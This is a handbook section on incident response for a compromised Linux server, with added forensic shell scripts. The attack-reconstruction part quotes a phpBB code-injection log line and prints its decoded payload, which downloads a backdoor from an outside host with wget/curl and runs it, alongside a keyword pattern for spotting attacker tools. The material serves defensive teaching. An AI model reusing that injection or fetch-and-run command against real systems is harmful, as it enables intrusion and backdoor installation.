
14.7. Dealing with a Compromised Machine


14.7.1. Detecting and Seeing the Cracker's Intrusion

Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance, one named apache instead of the standard /usr/sbin/apache2. If we follow that example, the thing to do is to note its process identifier, and check /proc/pid/exe to see what program this process is currently running:
# ls -al /proc/3719/exe
lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -> /var/tmp/.bash_httpd/psybnc
A program installed under /var/tmp/ and running as the web server? No doubt left, the machine is compromised.
This is only one example; many other hints can ring the administrator's bell:
  • an option to a command no longer works; the version of the software the command claims to be does not match the version that is supposed to be installed according to dpkg;
  • a command prompt or a session greeting indicates that the last connection came from an unknown server on another continent;
  • the /tmp/ partition turns out to be full, and it is full of illegal copies of movies;
  • and so on.
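Turning the /proc/PID/exe check above into a sweep of every running process, as an added example that is not the handbook's code: the prefixes /tmp, /var/tmp and /dev/shm, the "(deleted)" test and the argv[0] comparison are the author's heuristics, and dpkg -S is only used as a second hint. It reads /proc itself rather than trusting a possibly replaced ps, although a kernel-level rootkit can hide processes from /proc as well.

```shell
#!/bin/sh
# Sweep every running process for a program that does not look like installed
# software. Added example, not the handbook's code: the directory prefixes, the
# "(deleted)" test and the argv[0] comparison are the author's heuristics, and
# dpkg -S is only a second hint. Reads /proc directly instead of trusting ps,
# but a kernel rootkit can hide processes from /proc too. Run as root, since
# /proc/PID/exe of other users' processes is unreadable otherwise.

# True (exit 0) when the target of /proc/PID/exe looks out of place.
suspicious_exe() {
    target=$1
    case $target in
        "")            return 1 ;;   # kernel thread, or permission denied
        *" (deleted)") return 0 ;;   # binary unlinked after start: classic hiding
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;   # world-writable staging dirs
    esac
    return 1
}

# One line per finding: SUSPECT (path heuristic above), RENAMED (argv[0] does
# not match the real binary: the "apache" that is really psybnc case), or
# UNPACKAGED (dpkg owns no such file). Daemons that rewrite their own title,
# such as sshd or postgres, also show up as RENAMED; every line is a lead,
# not a verdict.
scan_running() {
    have_dpkg=0
    command -v dpkg >/dev/null 2>&1 && have_dpkg=1
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        [ -n "$exe" ] || continue
        argv0=$(tr '\0' '\n' < "$p/cmdline" 2>/dev/null | head -n 1)
        base=${exe##*/}
        if suspicious_exe "$exe"; then
            printf 'SUSPECT    pid=%s argv0=%s exe=%s\n' "$pid" "$argv0" "$exe"
        elif [ -n "$argv0" ] && [ "${argv0##*/}" != "$base" ]; then
            printf 'RENAMED    pid=%s argv0=%s exe=%s\n' "$pid" "$argv0" "$exe"
        elif [ "$have_dpkg" = 1 ] && ! dpkg -S "$exe" >/dev/null 2>&1; then
            printf 'UNPACKAGED pid=%s argv0=%s exe=%s\n' "$pid" "$argv0" "$exe"
        fi
    done
    return 0
}

scan_running
```

Run it from known-good binaries on read-only media. On a merged-/usr system dpkg -S may not recognise the canonical /usr path of a file it recorded under /bin or /lib, so an UNPACKAGED line is something to confirm with debsums, not a proof of tampering.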

14.7.2. Putting the Server Off-line

Unplugging the machine from the network may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it is usually a good idea to start by gathering some important information (see Section 14.7.3, “Keeping Everything that Could Be Used as Evidence”, Section 14.7.5, “Forensic Analysis” and Section 14.7.6, “Reconstituting the Attack Scenario”), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but sshd). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machine. Restricting sshd to the administrator's own source address with a firewall rule, and changing the administrator's credentials from a trusted machine, narrows that window without closing it.

14.7.3. Keeping Everything that Could Be Used as Evidence

Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (netstat -tupan for network connections, or ss -tupan where net-tools is not installed; ps auxf for a list of processes; ls -alR /proc/[0-9]* for a little more information on running programs), and every performed check should carefully be written down. Even these should be run from known-good, statically linked copies kept on read-only media, since the system's own binaries may have been replaced; a kernel-level rootkit can still lie to them, which is one more reason to treat the disk image, not these listings, as the authoritative evidence.
Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running sync) and reboot it on a rescue CD. Each partition should be copied with a tool such as dd; these images can be sent to another server (possibly with the convenient nc tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled. Whichever way is chosen, record a cryptographic hash of each image as soon as it is taken, so that the copy analyzed later can be shown to be identical to the one acquired.
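The two collection steps above (the minimal set of live checks, then the partition images) as a pair of scripts; this is an added example, not the handbook's code. It assumes that known-good statically linked tools are mounted read-only at $TOOLS and that the output directory is on clean external storage or a remote mount (both assumptions are the author's), and it writes a SHA-256 manifest next to everything it saves.

```shell
#!/bin/sh
# Evidence collection helpers. Added example, not the handbook's own code.
# Assumptions (not stated on the page): known-good statically linked tools are
# on read-only media mounted at $TOOLS, and the target directory is on clean
# external storage or a remote mount, never on the compromised disk.
TOOLS=${TOOLS:-/mnt/tools/bin}

# sha256sum is coreutils; fall back to shasum where only that exists.
hash256() { sha256sum "$@" 2>/dev/null || shasum -a 256 "$@"; }

# Run each command given in "$@", save its output under $1 as NN.out, record
# start time, end time and exit status in collection.log, then write a SHA-256
# manifest so the set can later be shown to be unaltered. The interpreter is
# taken from $TOOLS too when one is there: the system's sh is as suspect as ps.
collect_volatile() {
    dir=$1; shift
    mkdir -p "$dir" || return 1
    log=$dir/collection.log
    shell=$TOOLS/sh
    [ -x "$shell" ] || shell=sh
    n=0
    for cmd in "$@"; do
        n=$((n + 1))
        out=$dir/$(printf '%02d' "$n").out
        printf '%s START [%s]\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$cmd" >> "$log"
        rc=0
        PATH=$TOOLS:$PATH "$shell" -c "$cmd" > "$out" 2>> "$log" || rc=$?
        printf '%s END   rc=%s -> %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$rc" "$out" >> "$log"
    done
    (cd "$dir" && hash256 ./*.out collection.log > MANIFEST.sha256)
}

# Copy a partition (or whole disk) sector by sector and record SHA-256 of the
# source and of the image. conv=noerror keeps going past unreadable sectors and
# conv=sync pads each short read with zeros; with bs=512 (one sector) that
# padding only ever replaces a bad sector and never appends bytes at the end,
# which a larger bs would do on a device whose size is not a multiple of it.
# Returns 0 only when the image hashes the same as the source.
image_partition() {
    dev=$1; img=$2
    dd if="$dev" of="$img" bs=512 conv=noerror,sync 2>> "$img.log" || return 1
    src_hash=$(hash256 "$dev" | cut -d' ' -f1)
    img_hash=$(hash256 "$img" | cut -d' ' -f1)
    printf '%s  %s\n%s  %s\n' "$src_hash" "$dev" "$img_hash" "$img" > "$img.sha256"
    [ "$src_hash" = "$img_hash" ]
}

# Typical invocation on the compromised host (output directory on clean media):
#   collect_volatile /media/evidence/volatile 'date -u; uptime' 'netstat -tupan' \
#       'ps auxf' 'ls -alR /proc/[0-9]*' 'mount' 'last -ai'
#   image_partition /dev/sda1 /media/evidence/sda1.img
# To ship the image to another machine instead, as the text suggests, pipe dd
# into nc (OpenBSD netcat flags assumed; adjust for the nc you have):
#   on the collector:  nc -l 9000 > sda1.img
#   on the victim:     dd if=/dev/sda1 bs=512 conv=noerror,sync | nc -N collector 9000
```

image_partition reads the device twice (once to copy, once to hash), which is fine for a healthy disk; for one with read errors use ddrescue (gddrescue package) so that retries are handled properly, and take the hash of the resulting image as the reference value.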

14.7.4. Reinstalling

The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly backdoors). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems or remote consoles (although these cases should be rare). Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.

14.7.5. Forensic Analysis

Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the ro,nodev,noexec,noatime options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake. Note that ro alone does not stop ext3/ext4 from replaying the journal at mount time, which silently rewrites blocks of the image; add noload (and attach the image through a read-only loop device, losetup -r), and in any case work on a copy, keeping the original image and its hash untouched.
Retracing an attack scenario usually involves looking for everything that was modified and executed:
  • .bash_history files often make for a very interesting read;
  • listing files that were recently created, modified or read can help;
  • the strings command helps identify programs installed by the attacker, by extracting text strings from a binary;
  • the log files in /var/log/ often allow reconstructing a chronology of events;
  • special-purpose tools also allow restoring the contents of potentially deleted files, including log files deleted by attackers.
Some of these operations can be made easier with specialized software. In particular, the sleuthkit package provides many tools to analyze a filesystem. Their use is made easier by the Autopsy Forensic Browser graphical interface (in the autopsy package). Some Linux distributions have a “live install” image and contain many programs for forensic analysis, such as Kali Linux (see Section A.8, “Kali Linux”), with its forensic mode, BlackArch Linux, and the commercial Grml-Forensic, based on Grml (see Section A.6, “Grml”).
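The mount options and the “recently changed files” and strings items above as commands, as an added example that is not the handbook's code. It assumes a raw dd image of one ext4 partition (the filesystem type is an assumption) and the util-linux losetup and mount of GNU/Linux; the noload and losetup -r details, the choice of ctime over mtime and the keyword list fed to strings are the author's additions to the text's advice.

```shell
#!/bin/sh
# Post-mortem helpers for an acquired disk image. Added example, not the
# handbook's code. Assumes a raw dd image of one ext4 partition (filesystem
# type is an assumption) on GNU/Linux with util-linux; the noload and losetup
# details and the keyword list are the author's additions to the text's advice.

# Attach the image through a read-only loop device and mount it so that nothing
# on it can change or execute. "ro" by itself does not stop ext3/ext4 from
# replaying the journal at mount time and rewriting blocks; "noload" does.
# losetup -r is the second safety net. Needs root; work on a copy regardless.
mount_image() {
    img=$1; mnt=$2
    dev=$(losetup -r -f --show "$img") || return 1
    mount -t ext4 -o ro,noload,nodev,noexec,noatime "$dev" "$mnt"
}

# Regular files whose inode changed within the last N days, sorted by ctime
# within each batch ls receives. ctime is used rather than mtime because
# touch(1) lets an attacker back-date mtime but not ctime. -xdev keeps the
# walk from straying off the image onto the analysis host.
recent_changes() {
    mnt=$1; days=$2
    find "$mnt" -xdev -type f -ctime -"$days" -exec ls -lcdt {} +
}

# Keep only the strings that smell like attacker tooling. The pattern is a
# constructed starting point; it also matches plenty of legitimate software.
flag_strings() {
    grep -iE 'backdoor|shellcode|suid shell|bind ?shell|reverse ?shell|irc\.|/tmp/|wget |curl |password'
}

# strings over one suspect binary, filtered as above.
triage_strings() {
    strings -n 6 "$1" | flag_strings
}

# Typical session, after mount_image /evidence/sda1.img /mnt:
#   recent_changes /mnt 7
#   triage_strings /mnt/tmp/bd
```

For the deleted-file item, sleuthkit works on the image rather than the mount: fls -rd image.dd lists deleted directory entries with their inode numbers, and icat image.dd INODE writes the content of one of them to standard output.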

14.7.6. Reconstituting the Attack Scenario

The following log file excerpt comes from an Apache access.log:
- - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This example matches exploitation of an old security vulnerability in phpBB.
Decoding this long URL (%25 is a percent sign, so %2527 is a double-encoded quote and %252e a double-encoded dot, and the chr() calls spell out a string one byte at a time) leads to understanding that the attacker managed to run some PHP code, namely: system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &"). Indeed, a bd file was found in /tmp/. Running strings /mnt/tmp/bd returns, among others, the string PsychoPhobia Backdoor is starting.... This really looks like a backdoor.
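The decoding just described, done mechanically so that it can be repeated on every similar line in the log; this is an added example, not from the handbook. The log line embedded below is the one quoted in the text (the client address is not on the page and is not filled in); the parameter extraction and the two-pass decoder are the author's.

```shell
#!/bin/sh
# Decode the injected phpBB "highlight" parameter back into the command that
# system() ran. Added example, not from the handbook; SAMPLE_LOG is the line
# quoted in the text, the parsing is the author's.

# $1: one Apache access.log line. Prints the argument the injected PHP passed
# to system().
decode_highlight() {
    printf '%s\n' "$1" |
    sed -n 's/.*[?&]highlight=\([^ &"]*\).*/\1/p' |   # pull out the parameter value
    awk -v q="'" '
    function hexval(h,  i, v) {            # two hex digits -> number
        v = 0
        for (i = 1; i <= 2; i++)
            v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return v
    }
    function urldecode(s,  out) {          # one layer of %XX decoding
        out = ""
        while (s != "") {
            if (substr(s, 1, 1) == "%" && substr(s, 2, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out sprintf("%c", hexval(substr(s, 2, 2)))
                s = substr(s, 4)
            } else {
                out = out substr(s, 1, 1)
                s = substr(s, 2)
            }
        }
        return out
    }
    {
        # Two passes: %2527 -> %27 -> the quote that breaks out of the string.
        s = urldecode(urldecode($0))
        # Drop the PHP "." concatenation between consecutive chr() calls, then
        # turn every chr(N) into its byte; what remains is the command text.
        gsub(/\)\.chr\(/, ")chr(", s)
        while (match(s, /chr\([0-9]+\)/)) {
            n = substr(s, RSTART + 4, RLENGTH - 5)
            s = substr(s, 1, RSTART - 1) sprintf("%c", n + 0) substr(s, RSTART + RLENGTH)
        }
        # Strip the quote/dot glue used to splice the call into the PHP source.
        if (substr(s, 1, 2) == q ".") s = substr(s, 3)
        if (substr(s, length(s) - 1) == "." q) s = substr(s, 1, length(s) - 2)
        print s
    }'
}

# The line quoted in the text (client address absent there, so absent here).
SAMPLE_LOG='- - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'

decode_highlight "$SAMPLE_LOG"
```

Feeding the whole access.log through the function (grep highlight= access.log | while read -r l; do decode_highlight "$l"; done) turns every attempt of this kind into a readable command, which is usually faster than eyeballing the encoded lines.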
The access obtained was then used to download, install and run an IRC bot that connects to an underground IRC network. The bot is controlled over that protocol and instructed to download files for sharing. This program even has its own log file:
** 2004-11-29-19:50:15: NOTICE: :GAB! NOTICE ReV|DivXNeW|504 :DCC Chat (
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
Meanwhile, the attacker also downloaded a pair of extra files, /tmp/pt and /tmp/loginx. Running them through strings leads to strings such as Shellcode placed at 0x%08lx and Now wait for suid shell.... These look like a local exploit, an attempt to use a local vulnerability to gain administrative privileges. Did it succeed? In this case, probably not, since no files seem to have been modified after the initial breach (checking ctime rather than mtime, since the latter can be reset with touch).